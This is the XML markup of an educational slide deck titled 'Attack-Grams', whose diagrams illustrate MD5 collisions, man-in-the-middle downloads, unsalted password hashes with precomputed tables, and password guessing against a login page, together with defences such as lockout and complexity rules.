        <p:spPr>
          <a:xfrm>
            <a:off x="4298760" y="4329360"/>
            <a:ext cx="109656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MD5 Collision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Attack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8" name="Picture 19" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3555720" y="4478400"/>
            <a:ext cx="716400" cy="924120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2704320" y="5299560"/>
            <a:ext cx="2396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MD5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(Malware)=1234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TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2658240" y="3142080"/>
            <a:ext cx="20754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Download Server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(Not Secure)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TextBox 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6108840" y="3351960"/>
            <a:ext cx="95364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Man-in-the-middle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2" name="Picture 46" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3605760" y="4478400"/>
            <a:ext cx="716400" cy="870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3016800" y="336240"/>
            <a:ext cx="10513440" cy="54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7222" lnSpcReduction="10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Unsalted Hash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4" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="947880" y="1443240"/>
            <a:ext cx="716400" cy="870840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911880" y="2249280"/>
            <a:ext cx="802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/login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6" name="Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838080" y="4182840"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965880" y="5104080"/>
            <a:ext cx="681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User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98" name="Curved Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="196" idx="0"/>
            <a:endCxn id="195" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="528480" y="3398040"/>
            <a:ext cx="1569960" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="4445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199" name="Curved Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="194" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1664280" y="1878480"/>
            <a:ext cx="1642320" cy="846360"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33238"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="548235"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Oval Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1585080" y="3667680"/>
            <a:ext cx="2544480" cy="851400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45278"/>
              <a:gd name="adj2" fmla="val 57632"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="9000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="325490">
                <a:alpha val="3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user: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1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eve</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="16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pass: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>ABCDEFG</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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1" name="Can 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3016800" y="1207800"/>
            <a:ext cx="2966400" cy="2302920"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="18000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="325490">
                <a:alpha val="2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202" name="TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3868920" y="1313280"/>
            <a:ext cx="1193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Database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03" name="Table 12"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3306960" y="2024640"/>
          <a:ext cx="2422800" cy="1281600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="576000"/>
                <a:gridCol w="839160"/>
                <a:gridCol w="1008000"/>
              </a:tblGrid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id</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="12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username</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="12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passhash</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="12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5163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200" spc="-1" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="c00000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5164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eve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c00000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>E9A92A2…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5165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200" spc="-1" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="c00000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</a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="204" name="Graphic 23" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5454720" y="4182840"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5384520" y="5106960"/>
            <a:ext cx="1074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Attacker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TextBox 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4531320" y="3754440"/>
            <a:ext cx="1484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Data breach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07" name="Curved Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="4804920" y="3008520"/>
            <a:ext cx="1524960" cy="729720"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25029"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="208" name="Table 31"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6518160" y="3667680"/>
          <a:ext cx="2744280" cy="1281600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="933120"/>
                <a:gridCol w="669600"/>
                <a:gridCol w="1141920"/>
              </a:tblGrid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value</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="12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md5</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="12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sha256</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="12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2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200" spc="-1" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="c00000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ABCDEFG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BB74…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c00000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>E9A92A2…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2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200" spc="-1" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="c00000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209" name="TextBox 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6663240" y="3298320"/>
            <a:ext cx="2451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Precomputed hashes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1807920" y="34632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Password Guessing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1" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4958280" y="1690560"/>
            <a:ext cx="716400" cy="870840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4853520" y="2563560"/>
            <a:ext cx="802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/login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3" name="Graphic 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2210400" y="1650960"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2140200" y="2575080"/>
            <a:ext cx="1074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Attacker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15" name="Table 8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="707760" y="1690560"/>
          <a:ext cx="1302120" cy="1373400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1302480"/>
              </a:tblGrid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123456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password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c00000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>ABCDEFG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216" name="TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678960" y="3133440"/>
            <a:ext cx="13240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Common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Passwords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17" name="Straight Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2565720" y="2896200"/>
            <a:ext cx="11160" cy="3612960"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="a5a5a5"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="218" name="Straight Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5213880" y="2898720"/>
            <a:ext cx="2160" cy="3554280"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="a5a5a5"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="219" name="Picture 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="41000"/>
          </a:blip>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="181200">
            <a:off x="5907960" y="1653120"/>
            <a:ext cx="2013840" cy="2203560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="TextBox 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6028200" y="3855600"/>
            <a:ext cx="1893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Password Policy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TextBox 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="1787400"/>
            <a:ext cx="84420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sngStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Lockout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TextBox 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6507000" y="2095920"/>
            <a:ext cx="111528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sngStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Complexity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23" name="Straight Arrow Connector 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2574720" y="3278160"/>
            <a:ext cx="2632680" cy="2160"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3645000" y="2948760"/>
            <a:ext cx="1543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Try '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123456'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25" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566440" y="3292560"/>
            <a:ext cx="2649600" cy="855720"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="4472c4"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="TextBox 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20570400">
            <a:off x="2382840" y="3561480"/>
            <a:ext cx="2058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Invalid password!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27" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2567160" y="4171320"/>
            <a:ext cx="2648880" cy="2160"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="TextBox 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3508200" y="3843000"/>
            <a:ext cx="1761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Try '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password'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29" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2565720" y="4202280"/>
            <a:ext cx="2641680" cy="870120"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="4472c4"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20563200">
            <a:off x="2383920" y="4464000"/>
            <a:ext cx="2058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Invalid password!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TextBox 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3783960" y="4650120"/>
            <a:ext cx="361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…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32" name="Straight Arrow Connector 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2583360" y="5495760"/>
            <a:ext cx="2632680" cy="2160"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="TextBox 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3494160" y="5195160"/>
            <a:ext cx="1721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Try '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ABCDEFG'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34" name="Straight Arrow Connector 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2565720" y="5541480"/>
            <a:ext cx="2641680" cy="770040"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="70ad47"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="TextBox 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20638200">
            <a:off x="2395440" y="5740560"/>
            <a:ext cx="2061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Login authorized!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20688</TotalTime>
  <Application>LibreOffice/24.2.7.2$Linux_X86_64 LibreOffice_project/420$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Words>503</Words>
  <Paragraphs>206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2019-01-08T18:07:44Z</dcterms:created>
  <dc:creator>Paul Ionescu</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-30T08:58:39Z</dcterms:modified>
  <cp:revision>87</cp:revision>
  <dc:subject/>
  <dc:title>Attack-Grams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3</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="PresentationFormat">
    <vt:lpwstr>Widescreen</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Slides">
    <vt:i4>22</vt:i4>
  </property>
</Properties>
</file>